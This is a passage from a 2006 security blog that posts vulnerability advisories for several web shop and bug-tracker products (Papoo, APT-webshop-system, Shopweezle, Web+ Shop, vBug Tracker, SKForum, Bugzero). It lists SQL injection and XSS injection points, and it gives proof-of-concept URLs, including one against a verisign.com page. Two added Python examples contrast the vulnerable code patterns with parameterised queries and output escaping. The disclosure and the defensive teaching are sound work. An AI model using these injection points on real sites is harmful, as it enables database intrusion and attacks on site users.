Additional info: I discovered and reported some SQL vulns in Papoo 2.1.2 on 21 December 2005, and nothing was fixed.
Then Dj_Eyes, Crouz Security Team, discovered a similar vuln. It was in the 2.1.4 version, on 2006-02-09..

So, I didn't check if the old reported bugs are fixed, just saw that "menuid" is still a good one :)

So, GreetZ to Vendors!

Here are the refs:

http://pridels.blogspot.com/2005/12/papoo-multiple-sql-vuln.html
http://secunia.com/advisories/18152/

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Verisign.com XSS vuln.

http://www-apps.verisign.com/dpde/linkServer.vwa?slot_id=%22%3Cscript%3Ealert('r0t')%3C/script%3E

Error 500--Internal Server Error

Sunday, April 09, 2006

APT-webshop-system vuln.

###############################################
Vuln. discovered by : r0t
Date: 9 april 2006
vendor:http://www.apt-webservice.de/shopsoftware/
affected versions:
4.0 PRO
3.0 BASIC
3.0 LIGHT
###############################################


Vuln. description:


1. SQL injection vuln.

APT-webshop-system contains flaws that allow remote SQL injection attacks. Input passed to the "group", "seite" and "id" parameters in "modules.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

examples:


/modules.php?warp=artikel&group=[SQL]
/modules.php?warp=artikel&group=&seite=[SQL]
/modules.php?warp=artikel&group=&seite=&id=[SQL]

2. Full Path Disclosure

An attacker can obtain the full install path by triggering the SQL injection flaw above.



+ Bonus:

/modules.php?warp=File

&

/modules.php?warp=basket&message=%3Cli%3E%3Ca%20href=http://r0t.in/%3EUNSECURED%20SYSTEMS%3C/a%3E%3C/li%3E

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Saturday, April 08, 2006

Shopweezle 2.0 multiple vuln.

###############################################
Vuln. discovered by : r0t
Date: 9 april 2006
vendor:http://shopweezle.de/
affected versions:
ShopWeezle PERSONAL
ShopWeezle PROFESSIONAL
ShopWeezle PROFESSIONAL+
###############################################


Vuln. description:


1. SQL injection vuln.

Shopweezle contains flaws that allow remote SQL injection attacks. Input passed to the "itemID", "brandID" and "album" parameters isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

examples:

/login.php?caller=xlink&url=detail.php&itemID=1[SQL]
/index.php?x=0&itemgr=1[SQL]
/index.php?caller=xlink&url=brand.php&brandID=1[SQL]
/memo.php?itemID=1[SQL]
/index.php?x=0&caller=xlink&url=gallery.php&album=1[SQL]

2. Full Path Disclosure

An attacker can obtain the full install path by triggering the SQL injection flaw above.


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/
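The three SQL injection advisories above (Papoo, APT-webshop-system, Shopweezle) all come down to a query-string value pasted into a query, and two of them also leak the install path through the resulting database error. This added Python/sqlite3 example is not code from any of those vendors: it contrasts that pattern with the "properly sanitised" form for an id-type parameter and a free-text one, and wraps the lookup so the error is never echoed. The table, column names and handler are constructed for illustration.

```python
import re
import sqlite3

# Constructed in-memory schema standing in for a shop's item table
# (an assumption for this example, not the vendors' real schema).
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE items (id INTEGER PRIMARY KEY, name TEXT, lang TEXT)")
    db.executemany("INSERT INTO items VALUES (?, ?, ?)",
                   [(1, "lamp", "de"), (2, "chair", "de"), (3, "table", "en")])
    return db

def vulnerable_lookup(db, item_id):
    # The pattern the advisories describe: the raw query-string value is
    # concatenated into the SQL text, so a value like "1 OR 1=1" rewrites
    # the WHERE clause instead of selecting one row.
    sql = "SELECT id, name FROM items WHERE id = " + item_id
    return db.execute(sql).fetchall()

# Shape check for id-type parameters (itemID, brandID, menuid, ...): a positive
# integer of at most ten digits, nothing else.
ID_RE = re.compile(r"[1-9][0-9]{0,9}")

def hardened_lookup(db, item_id):
    # 1. Validate the shape before any SQL runs.
    if not ID_RE.fullmatch(item_id):
        raise ValueError("itemID must be a positive integer")
    # 2. Bind the value: the driver passes it as data, never as query text.
    return db.execute("SELECT id, name FROM items WHERE id = ?",
                      (int(item_id),)).fetchall()

def hardened_by_lang(db, lang):
    # Free-text parameters such as "getlang" cannot be reduced to an integer,
    # so binding is the control: quotes in the value never alter the statement.
    return db.execute("SELECT id, name FROM items WHERE lang = ?", (lang,)).fetchall()

def handle_item_request(db, item_id):
    # Page-facing wrapper: a rejected value or a database error yields a fixed
    # message. Echoing the raw error is what disclosed the install path in the
    # shops above, so the exception text never reaches the response.
    try:
        return hardened_lookup(db, item_id)
    except (ValueError, sqlite3.Error):
        return "invalid request"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", vulnerable_lookup(db, "1 OR 1=1"))   # every row
    print("hardened:  ", handle_item_request(db, "1 OR 1=1"))  # invalid request
    print("hardened:  ", hardened_by_lang(db, "de' OR '1'='1"))  # []
```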

Web+ Shop 5.0 XSS

###############################################
Vuln. discovered by : r0t
Date: 8 april 2006
vendor:www.talentsoft.com/products/webplusshop/index.en.wml
affected versions:Web+ Shop 5.0 and previous
###############################################

Vuln. description:

Web+ Shop contains a flaw that allows remote cross site scripting attacks.
This flaw exists because input passed to the "deptname" parameter isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


example:

http://host.com/cgi-bin/webplus.exe?script=/webpshop/department.wml&deptid=3&deptname=[XSS]

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Wednesday, April 05, 2006

vBug Tracker for vBulletin 3.5.x XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 5 april 2006
vendor:www.vbulletin.org
affected versions:vBug Tracker Version 3.5.1 and previous
###############################################

vBug Tracker contains a flaw that allows remote cross site scripting attacks.
This flaw exists because input passed to the "sortorder" parameter isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

example :

/vbugs.php?do=list&s=&textsearch=&vbug_typeid=0&vbug_statusid=0&vbug_severityid=0&vbug_versionid=0&assignment=0&sortfield=lastedit&sortorder=%22%3Cscript%3Ealert('r0t')%3C/script%3E

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

SKForum XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 5 april 2006
vendor:http://soft.killingar.net/documents/SKForum
affected versions:1.5 and prior
###############################################

Vuln. Description:

SKForum contains a flaw that allows remote cross site scripting attacks. This flaw exists because input passed to the "areaID", "time" and "userID" parameters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

examples:

/area.View.action?areaID=[XSS]
/planning.View.action?time=[XSS]
/user.View.action?userID=[XSS]

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Saturday, April 01, 2006

Bugzero XSS vuln.

###############################################
Vuln. discovered by : r0t (unsecured-systems)
Date: 1 april 2006
vendor:http://www.websina.com/bugzero/
affected versions:V.4.3.1 and also development version.
###############################################

Bugzero contains flaws that allow remote cross site scripting attacks.
These flaws exist because input passed to the "msg" parameter in "query.jsp" and the "entryId" parameter in "edit.jsp" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

examples :

/bugzero/jsp/query.jsp?msg=[XSS]
/bugzero/jsp/edit.jsp?projectId=&entryId=[XSS]

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/
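The reflected XSS advisories on this page (interaktiv.shop, Web+ Shop, vBug Tracker, SKForum, Bugzero) all use the same `%22%3Cscript%3E...` payload, which decodes to a double quote followed by a script tag and so targets a parameter echoed inside an HTML attribute. This added Python example, not code from any of those projects, decodes that value from a constructed query string and contrasts raw interpolation with output escaping; the `<input>` template and the parameter name are assumptions.

```python
import html
from urllib.parse import parse_qs

# Constructed query string in the form the advisories use (Bugzero's
# query.jsp "msg" parameter); it decodes to: "<script>alert('r0t')</script>
ADVISORY_QS = "msg=%22%3Cscript%3Ealert('r0t')%3C/script%3E"

def reflected_param(query_string, name):
    """Return the URL-decoded value of one query parameter ('' if absent)."""
    values = parse_qs(query_string, keep_blank_values=True).get(name, [""])
    return values[0]

def render_vulnerable(msg):
    # The pattern the advisories describe: the decoded value is written
    # straight into the page. Here the sink is an attribute value, so the
    # leading " closes it and the rest of the parameter is parsed as markup.
    return '<input name="msg" value="' + msg + '">'

def render_hardened(msg):
    # Escaping at the output point: with quote=True, html.escape rewrites
    # & < > " and ', so the value can neither end the attribute nor open a tag.
    return '<input name="msg" value="' + html.escape(msg, quote=True) + '">'

def leaves_attribute(rendered):
    """True if the parameter produced markup of its own.

    The template contains exactly one '<'; any further '<' in the rendered
    output can only have come from the reflected value.
    """
    return rendered.count("<") > 1

if __name__ == "__main__":
    value = reflected_param(ADVISORY_QS, "msg")
    print("decoded:   ", value)
    print("vulnerable:", render_vulnerable(value), leaves_attribute(render_vulnerable(value)))
    print("hardened:  ", render_hardened(value), leaves_attribute(render_hardened(value)))
```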

 
Copyright (c) 2006 Pridels Sec Crew